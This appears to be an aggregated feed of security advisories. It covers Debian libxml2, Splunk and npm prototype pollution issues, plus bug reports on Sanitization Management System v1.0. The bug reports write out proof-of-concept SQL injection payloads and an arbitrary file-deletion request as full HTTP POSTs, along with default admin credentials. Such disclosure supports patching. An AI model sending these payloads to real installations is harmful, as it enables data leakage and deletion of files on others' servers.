Debian Linux Security Advisory 5271-1 - Several vulnerabilities were discovered in libxml2, a library providing support to read, modify and write XML and HTML files.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5271-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
November 05, 2022                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : libxml2  
CVE ID         : CVE-2022-40303 CVE-2022-40304  
Debian Bug     : 1022224 1022225

Several vulnerabilities were discovered in libxml2, a library providing  
support to read, modify and write XML and HTML files.

CVE-2022-40303

    Maddie Stone discovered that missing safety checks in several  
    functions can result in integer overflows when parsing a XML  
    document with the XML_PARSE_HUGE option enabled.

CVE-2022-40304

    Ned Williamson and Nathan Wachholz discovered a vulnerability when  
    handling detection of entity reference cycles, which may result in  
    corrupted dictionary entries. This flaw may lead to logic errors,  
    including memory errors like double free flaws.

For the stable distribution (bullseye), these problems have been fixed in  
version 2.9.10+dfsg-6.7+deb11u3.

We recommend that you upgrade your libxml2 packages.

For the detailed security status of libxml2 please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/libxml2

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmNmu0JfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QPYQ/5AQtGMTA78fVUCt9lBuzBbGe5F/2jOHmP2CIlEbV3RnHtZe9wMGlcYvSq  
4hDRvu8OEHmSwqHyRbghQt2oCvSLhtIhqxf0Itro5Pv8PWrhoFy6TdNX9tW+ARqz  
TIF93hiHeTuQO+XqkTct50KUlTB6ccZDREqx7tGK4B/8fHM+34vPca0nRpWHUaXM  
aUJtgGNRvO+th3qulMKGGzE2K05678D1RYngF3T/NJ0+aobfdd4dVOobyVqotF76  
thwO04V54oXVNuaRUJ5ItGKcY6sLx0l0cJ+HysB93xS2TGDAZhayFkMRKTk7hfOo  
B08LPMnYjcbb+A1cezT+XpgcTOir+pZXuNSUuB7Q1vwERXGnhdMC0Z8hwTL5o18A  
h4S6fk7vPSIIOzOGkAWYQ0mjsG5c45rXDVCp4u9LwIqIEAq/pXI7UTp+kJFSRerk  
Q8lWBuTiwjlaaFGslANxmbPJtfS4PHFFLPnjJJArhJI0CRi5cq3Htruw/5sVgwTj  
Xu+d1ht/jmmNfNS4qTDBpq1wJVmpc82qrxT8uDLp1BK2nBx6tSnsDViENIPBZE3O  
OzmIYYCAuXvhKK4QG9H/02hBBhwSFVI/TnFzFhF8KyA95VXCYpBkUpweU0in4PuK  
l4/gd0lPZGeJDw7VI+p7HG5GeOA/7d+NkvwrHaHe4iShFfHYZxIŽtg  
-----END PGP SIGNATURE-----

Debian Security Advisory 5271-1

Sanitization Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /php-sms/classes/Master.php?f=delete_quote.

Permalink

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Hujozay

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/classes/Master.php?f=delete\_quote

Vulnerability location: /php-sms/classes/Master.php?f=delete\_quote, id

dbname =sms\_db,length=6

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /php\-sms/classes/Master.php?f\=delete\_quote HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/php-sms/admin/?page=services
Content-Length: 65
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43352: bug_report/SQLi-1.md at main · Hujozay/bug_report

Sanitization Management System v1.0 was discovered to contain an arbitrary file deletion vulnerability via the component /classes/Master.php?f=delete_img.

**Sanitization Management System v1.0 by oretnom23 has Delete any file**

BUG\_Author: Hujozay

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

Vulnerability File: /php-sms/classes/Master.php?f=delete\_img

Vulnerability location: /php-sms/classes/Master.php?f=delete\_img, path

The password for the backend login account is: admin/admin123

Payload:

Here we delete the shel.php file in the root directory

POST /php\-sms/classes/Master.php?f\=delete\_img HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/php-sms/admin/?page=system\_info
Content-Length: 71
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close
path=C%3A%2Fxampp%2Fhtdocs%2Fphp-sms%2Fuploads%2Fbanner%2Fshell.php

At present, the shell.php file is still in the directory of the website, when we send a request to delete the shell.php file

The response package shows that the deletion was successful. Let's go to the directory to see if the shell.php file still exists. 

By this time, shell.php has been deleted.

CVE-2022-43351: bug_report/delete-file-1.md at main · Hujozay/bug_report

Sanitization Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /php-sms/classes/Master.php?f=delete_inquiry.

Permalink

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Hujozay

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/classes/Master.php?f=delete\_inquiry

Vulnerability location: /php-sms/classes/Master.php?f=delete\_inquiry, id

dbname =sms\_db,length=6

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /php\-sms/classes/Master.php?f\=delete\_inquiry HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/php-sms/admin/?page=services
Content-Length: 65
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43350: bug_report/SQLi-2.md at main · Hujozay/bug_report

In Splunk Enterprise versions below 8.2.9 and 8.1.12, the way that the ‘tstats command handles Javascript Object Notation (JSON) lets an attacker bypass SPL safeguards for risky commands https://docs.splunk.com/Documentation/SplunkCloud/latest/Security/SPLsafeguards . The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser.

**Advisory ID:** SVD-2022-1105

**Published:** 2022-11-02

**CVSSv3.1 Score:** 8.1, High

**CWE:** CWE-20

**CVE ID:** CVE-2022-43565

**Last Update:** 2022-11-02

**CVSSv3.1 Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

**Bug ID:** SPL-224121

**Description**

In Splunk Enterprise versions below 8.2.9 and 8.1.12, the way that the ‘tstats’ command handles Javascript Object Notation (JSON) lets an attacker bypass SPL safeguards for risky commands. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser.   

**Solution**

For Splunk Enterprise, upgrade versions to 8.1.12, 8.2.9, or higher.  

For Splunk Cloud Platform versions below 9.0.2203, Splunk is actively patching and monitoring the Splunk Cloud instances. To request an immediate upgrade, determine which version of Splunk Cloud Platform you're running, then create a new support case.

**Product Status**

Product

Version

Component

Affected Version

Fixed Version

Splunk Enterprise

8.1

Search

8.1.11 and lower

8.1.12

Splunk Enterprise

8.2

Search

8.2.0 to 8.2.8

8.2.9

Splunk Enterprise

9.0

Search

Not Affected

\-

Splunk Cloud Platform

\-

Search

9.0.2202 and lower

9.0.2203

**Mitigations and Workarounds**

The vulnerability affects instances with Splunk Web enabled; disabling Splunk Web is a possible workaround. See Disable unnecessary Splunk Enterprise components and the web.conf configuration specification file for more information on disabling Splunk Web.  

**Detections**

None

**Severity **

Splunk rates the vulnerability as High, 8.1, with a CVSS Vectors of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N.

The vulnerability requires a user interaction within a browser of a privileged user. The vulnerability lets an attacker run risky commands with permissions of a highly privileged user. For more information on risky commands and potential impacts, see SPL safeguards for risky commands. 

If the Splunk Enterprise instance does not run Splunk Web, there is no impact and the severity is Informational.  

Questions? Submit your question to Splunk Support.

CVE-2022-43565: SVD-2022-1105 | Splunk

In Splunk Enterprise versions below 8.1.12, 8.2.9, and 9.0.2, a View allows for a Reflected Cross Site Scripting via JavaScript Object Notation (JSON) in a query parameter when output_mode=radio.

**Advisory ID:** SVD-2022-1108

**Published:** 2022-11-02

**CVSSv3.1 Score:** 8.8, High

**CWE:** CWE-79

**CVE ID:** CVE-2022-43568

**Last Update:** 2022-11-02

**CVSSv3.1 Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**Bug ID:** SPL-228379

**Description**

In Splunk Enterprise versions below 8.1.12, 8.2.9, and 9.0.2, a View allows for a Reflected Cross Site Scripting via JavaScript Object Notation (JSON) in a query parameter when output\_mode=radio.  

**Solution**

For Splunk Enterprise, upgrade versions to 8.1.12, 8.2.9, 9.0.2, or higher.  

For Splunk Cloud Platform versions below 9.0.2205, Splunk is actively patching and monitoring the Splunk Cloud instances. To request an immediate upgrade, determine which version of Splunk Cloud Platform you're running, then create a new support case.

**Product Status**

Product

Version

Component

Affected Version

Fixed Version

Splunk Enterprise

8.1

Splunk Web

8.1.11 and lower

8.1.12

Splunk Enterprise

8.2

Splunk Web  

8.2.0 to 8.2.8

8.2.9

Splunk Enterprise

9.0

Splunk Web  

9.0.0 to 9.0.1

9.0.2

Splunk Cloud Platform

\-

Splunk Web  

9.0.2203.4 and lower

9.0.2205

**Mitigations and Workarounds**

The vulnerability affects instances with Splunk Web enabled, disabling Splunk Web is a possible workaround. See Disable unnecessary Splunk Enterprise components and the web.conf configuration specification file for more information on disabling Splunk Web.  

**Detections**

**Splunk Reflected XSS in the templates lists radio**  

Splunk versions 8.1.0, 8.2.0, and 9.0.0 are vulnerable to reflected cross site scripting (XSS) exploitation leading to Local File Inclusion (LFI) in the Splunk Assist application. This detection search provides information on exploitation attempts.  

**Severity **

Splunk rates the vulnerability as High, 8.8, with a CVSS Vectors of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H. The vulnerability requires user interaction within a browser. If the Splunk Enterprise instance does not run Splunk Web, there is no impact and the severity is Informational.  

**Acknowledgments**

Danylo Dmytriiev (DDV\_UA)

CVE-2022-43568: SVD-2022-1108 | Splunk

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 28 and Nov. 4. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for October 28 to November 4

WebKit suffers from an HTMLSelectElement use-after-free vulnerability.

WebKit HTMLSelectElement Use-After-Free

deep-parse-json version 1.0.2 allows an external attacker to edit or add new properties to an object. This is possible because the application does not correctly validate the incoming JSON keys, thus allowing the `__proto__` property to be edited.

**deep-parse-json vulnerable to Prototype Pollution**

Moderate severity GitHub Reviewed Published Nov 4, 2022 • Updated Nov 8, 2022

GHSA-ff9j-pwxg-q5p2: deep-parse-json vulnerable to Prototype Pollution

fastest-json-copy version 1.0.1 allows an external attacker to edit or add new properties to an object. This is possible because the application does not correctly validate the incoming JSON keys, thus allowing the `__proto__` property to be edited.

**fastest-json-copy vulnerable to Prototype Pollution**

Moderate severity GitHub Reviewed Published Nov 4, 2022 • Updated Nov 8, 2022

Tag

#js